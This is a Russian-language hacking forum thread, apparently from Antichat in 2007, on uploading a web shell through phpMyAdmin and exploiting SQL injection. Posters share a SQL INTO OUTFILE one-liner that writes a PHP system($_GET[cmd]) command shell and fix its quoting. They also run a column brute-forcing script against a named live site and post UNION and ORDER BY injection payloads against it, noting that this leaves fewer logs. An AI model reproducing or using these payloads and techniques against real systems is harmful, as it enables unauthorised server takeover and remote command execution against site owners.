phpMyAdmin

Discussion in 'Уязвимости' started by heks, 26 Dec 2007.

  1. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    у меня такой вопрос есть ли способ загрузить web shell через phpMyAdmin Если есть то пожалуйста обьясните как или дайте топик где это уже обьяснялося
     
    #1 heks, 26 Dec 2007
    Last edited: 26 Dec 2007
  2. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    хм
    Средствами SQL например
    select <?system($_GET[cmd])?> into outfile '/путь/к/шеллу.php'
     
    4 people like this.
  3. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    и как всегда помог Spyder
     
  4. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    еще один вопрос можно ли сделать какую либо ошибку в базе данных или в phpMyAdmin что бы определить путь к домашней директории
     
  5. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Возникал такой же вопрос недели 3 назад...Пытался таим спопобом залить шелл, но не нашёл диру на запись...
    Есть ли другой способ?
     
  6. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Code:
    http://www.google.ru/search?complete=1&hl=ru&newwindow=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&hs=j4T&q=phpmyadmin+%D1%80%D0%B0%D1%81%D0%BA%D1%80%D1%8B%D1%82%D0%B8%D0%B5+%D0%BF%D1%83%D1%82%D0%B5%D0%B9&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=
    Я другого способа не знаю, только так имхо
     
  7. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Spyder, про гугль я и без тебя знаю. Думал, может на ачате помогут...Ладно будем искать...
     
  8. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    Не найдено ни одного документа, соответствующего запросу phpmyadmin раскры% D1‚РёРµ путей.

    Рекомендации:
    Убедитесь, что все слова написаны без ошибок.
    Попробуйте использовать другие ключевые слова.
    Попробуйте использовать более популярные ключевые слова.
    Попробуйте уменьшить количество слов в запросе.


    Вот что на твой запрос выдает
     
  9. Alexsize

    Alexsize Fail

    Joined:
    17 Sep 2005
    Messages:
    1,771
    Likes Received:
    1,221
    Reputations:
    704
    Ачат ставит пробелы в урле. Убери их.
     
    2 people like this.
  10. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    спасибо а я то и не заметил
     
  11. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    http://www.google.ru/search?q=phpmyadmin+раскрытие+путей
     
    3 people like this.
  12. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    нужен скрипт на perl'e который быстро подбирает количество столбцов при sql инекциях у кого есть пожалуйста выложите давно такой ищу
     
  13. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    https://forum.antichat.ru/thread28461.html
    https://forum.antichat.ru/threadnav24918-1-40.html
     
    1 person likes this.
  14. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    https://forum.antichat.ru/thread28461.html
    по этой ссылке запускаю скрипт так
    C:\sql\public>sql_check_111.pl -u "http://zonewm.biz/showa.php?id=129'"
    мне выдает следующее

    C:\sql\public>sql_check_111.pl -u "http://zonewm.biz/showa.php?id=129'"


    =====_Script_Brut_Columns_=====

    Wed Dec 26 16:59:16 2007

    *URL:___________http://zonewm.biz/showa.php?id=129'
    Evristic:______ON
    Min_columns:___1
    Max_columns:___50
    Metod:_________UNION
    SPACE:_________%20
    NULL:__________1,2,3...
    POST-GET:______GET
    Time(sleep):___0
    User-Agent:____useragent.txt
    PROXY:_________proxy.txt
    Log:___________log_check.txt

    =====_Script_Brut_Columns_=====

    GO!

    Start evristic detection. Please, WAIT...

    Detect MySQL

    Start UNION SELECT

    Please, wait...

    Try 1 column...
    ------------------------

    OK! Find 1 columns.

    Right URL:
    http://zonewm.biz/showa.php?id=129'%20UNION%20SELECT%201/*


    что я не то делаю?
     
  15. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    http://zonewm.biz/showa.php?id=12%20union%20select%201,2,3,4,5,6,7,8/* рукми лучше всего =)
     
  16. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    дело в том что нужен скрипт ручками то я подобрал дело в том что встречаются сайты у которых по 80 строк ручками подбирать придется долго
     
  17. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    алгоритм
    -1+order+by+1/*
    -1+order+by+100/* ошибка -> -1+order+by+50/* нет ошибки -> -1+order+by+75/* ошибка -> -1+order+by+61/*
    итд...

    heks, и логов меньше оставишь, и руку набьешь)))
     
    #17 AFoST, 26 Dec 2007
    Last edited: 26 Dec 2007
    1 person likes this.
  18. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    блин давно эотел найти такой запрос пасиб AFoST
     
  19. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Никога так не заливал. Решил попробовать вот что выплюнул
    Выставил права на 777 и сделал строку типа <? SQL: select <?system($_GET[cmd])?>
    Тоже самое.

    #1064 - You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '<?php system($_GET[cmd])?> into outfile '/www/sait.ru/php
     
    #19 Ershik, 26 Dec 2007
    Last edited: 26 Dec 2007
  20. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    <?system($_GET['cmd'])?>
    Обрами в "ковычки"